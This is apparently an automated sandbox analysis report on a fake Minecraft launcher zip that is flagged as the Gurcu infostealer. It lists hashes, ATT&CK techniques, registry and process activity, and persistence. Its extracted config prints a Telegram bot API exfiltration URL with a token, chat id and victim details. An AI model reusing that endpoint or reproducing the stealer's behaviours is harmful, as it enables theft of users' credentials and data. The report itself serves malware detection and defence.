gurcu | 1c3b03688284094e07ebe4a6c8df9887163181cdb978eb0146070e59f96c29e7

Analysis

max time kernel
740s
max time network
670s
platform
windows10-2004_x64
resource
win10v2004-20241007-it
resource tags

arch:x64arch:x86image:win10v2004-20241007-itlocale:it-itos:windows10-2004-x64systemwindows
submitted
18-10-2024 12:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Apollo_Launcher.zip
Size

1.9MB
MD5

fc08798203969295d9225e2f839db477
SHA1

405ccb1dd21f38d76536e0d2d8da47997816d816
SHA256

1c3b03688284094e07ebe4a6c8df9887163181cdb978eb0146070e59f96c29e7
SHA512

d78b1fc0cc0306ce15c28088e51a9018602f1fa482152b4386c9769e7bd751d845f2d246332c0b6a0335a5805e2d6388b8f7ec2dae716eb98901e75a180668ad
SSDEEP

49152:ZZwS4Jj6b359B6BwDqu9OHLE0QTt3s0rjS0x8UF:USO8359B6nu9OQnS0z

Score

10^/10

gurcu discovery execution spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4549607810&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

13636 powershell.exe
2548 powershell.exe
13636 powershell.exe
2548 powershell.exe

pid	process
13636	powershell.exe
2548	powershell.exe
13636	powershell.exe
2548	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MinecraftJava.exeMinecraft_Client_1.21.1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	MinecraftJava.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Minecraft_Client_1.21.1.exe

Executes dropped EXE 6 IoCs

Processes:

SKlauncher-3.2.10.exejavaw.exeMinecraftJava.exeMinecraft_Client_1.21.1.exeSKlauncher-3.2.10.exeMinecraft_Client_1.21.1.exe

pid	process
1452	SKlauncher-3.2.10.exe
5104	javaw.exe
2276	MinecraftJava.exe
14296	Minecraft_Client_1.21.1.exe
3028	SKlauncher-3.2.10.exe
10688	Minecraft_Client_1.21.1.exe

Loads dropped DLL 37 IoCs

Processes:

SKlauncher-3.2.10.exejavaw.exeMinecraftJava.exeMinecraft_Client_1.21.1.exeSKlauncher-3.2.10.exeMinecraft_Client_1.21.1.exe

pid	process
1452	SKlauncher-3.2.10.exe
5104	javaw.exe
5104	javaw.exe
5104	javaw.exe
5104	javaw.exe
5104	javaw.exe
5104	javaw.exe
5104	javaw.exe
5104	javaw.exe
5104	javaw.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
14296	Minecraft_Client_1.21.1.exe
3028	SKlauncher-3.2.10.exe
10688	Minecraft_Client_1.21.1.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

Processes:

flow	ioc
408	pastebin.com
409	raw.githubusercontent.com
410	raw.githubusercontent.com
341	pastebin.com
342	pastebin.com
343	raw.githubusercontent.com
344	raw.githubusercontent.com
346	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

349 ip-api.com
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Drops file in Windows directory 1 IoCs

Processes:

chrome.exe

description ioc process

File opened for modification C:\Windows\INF\display.PNF chrome.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
349	ip-api.com

description	ioc	process
File opened for modification	C:\Windows\INF\display.PNF	chrome.exe

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

javaw.exeMinecraftJava.exeMinecraft_Client_1.21.1.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	javaw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	MinecraftJava.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\	MinecraftJava.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MinecraftJava.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MinecraftJava.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	MinecraftJava.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MinecraftJava.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MinecraftJava.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MinecraftJava.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	javaw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MinecraftJava.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Minecraft_Client_1.21.1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Minecraft_Client_1.21.1.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4232 timeout.exe
13644 timeout.exe

pid	process
4232	timeout.exe
13644	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133737284200074180"	chrome.exe

Modifies registry class 9 IoCs

Processes:

MinecraftJava.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657	MinecraftJava.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657\ = "URL:Run game 831593107883032657 protocol"	MinecraftJava.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657\URL Protocol	MinecraftJava.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657\shell\open	MinecraftJava.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\.minecraft\\runtime\\minecraft-java-exe\\MinecraftJava.exe"	MinecraftJava.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657\DefaultIcon	MinecraftJava.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\.minecraft\\runtime\\minecraft-java-exe\\MinecraftJava.exe"	MinecraftJava.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657\shell\open\command	MinecraftJava.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-831593107883032657\shell	MinecraftJava.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

5472 NOTEPAD.EXE
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

13592 schtasks.exe
232 schtasks.exe

pid	process
5472	NOTEPAD.EXE

pid	process
13592	schtasks.exe
232	schtasks.exe

Suspicious behavior: EnumeratesProcesses 58 IoCs

Processes:

chrome.exechrome.exeMinecraftJava.exepowershell.exeMinecraft_Client_1.21.1.exepowershell.exeMinecraft_Client_1.21.1.exe

pid	process
2936	chrome.exe
2936	chrome.exe
3260	chrome.exe
3260	chrome.exe
3260	chrome.exe
3260	chrome.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
2276	MinecraftJava.exe
13636	powershell.exe
13636	powershell.exe
13636	powershell.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
14296	Minecraft_Client_1.21.1.exe
2548	powershell.exe
2548	powershell.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe
10688	Minecraft_Client_1.21.1.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

1464 7zFM.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

chrome.exe

pid process

2936 chrome.exe
2936 chrome.exe
2936 chrome.exe
2936 chrome.exe
2936 chrome.exe
2936 chrome.exe
2936 chrome.exe
2936 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exechrome.exe

description	pid	process
Token: SeRestorePrivilege	1464	7zFM.exe
Token: 35	1464	7zFM.exe
Token: SeSecurityPrivilege	1464	7zFM.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe
Token: SeCreatePagefilePrivilege	2936	chrome.exe
Token: SeShutdownPrivilege	2936	chrome.exe

Suspicious use of FindShellTrayWindow 36 IoCs

Processes:

7zFM.exechrome.exe

pid	process
1464	7zFM.exe
1464	7zFM.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

SKlauncher-3.2.10.exeMinecraftJava.exejava.exeSKlauncher-3.2.10.exejava.exe

pid	process
1452	SKlauncher-3.2.10.exe
1452	SKlauncher-3.2.10.exe
1452	SKlauncher-3.2.10.exe
2276	MinecraftJava.exe
13856	java.exe
13856	java.exe
3028	SKlauncher-3.2.10.exe
3028	SKlauncher-3.2.10.exe
3028	SKlauncher-3.2.10.exe
2760	java.exe
2760	java.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2936 wrote to memory of 4172	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 4172	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 2648	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1368	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1368	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe
PID 2936 wrote to memory of 1184	2936	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Apollo_Launcher.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1464

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb607bcc40,0x7ffb607bcc4c,0x7ffb607bcc58
  2⤵
  PID:4172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:2648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2064,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2092 /prefetch:3
  2⤵
  PID:1368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2524 /prefetch:8
  2⤵
  PID:1184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3296,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:3752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4632,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1
  2⤵
  PID:2932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4428 /prefetch:8
  2⤵
  PID:2704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4432,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4820 /prefetch:8
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4760,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5036 /prefetch:8
  2⤵
  PID:4728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4492,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:2828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3416,i,11811515133686052384,11059499783949124908,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:4476
- C:\Program Files\Google\Chrome\Application\chrome.exe
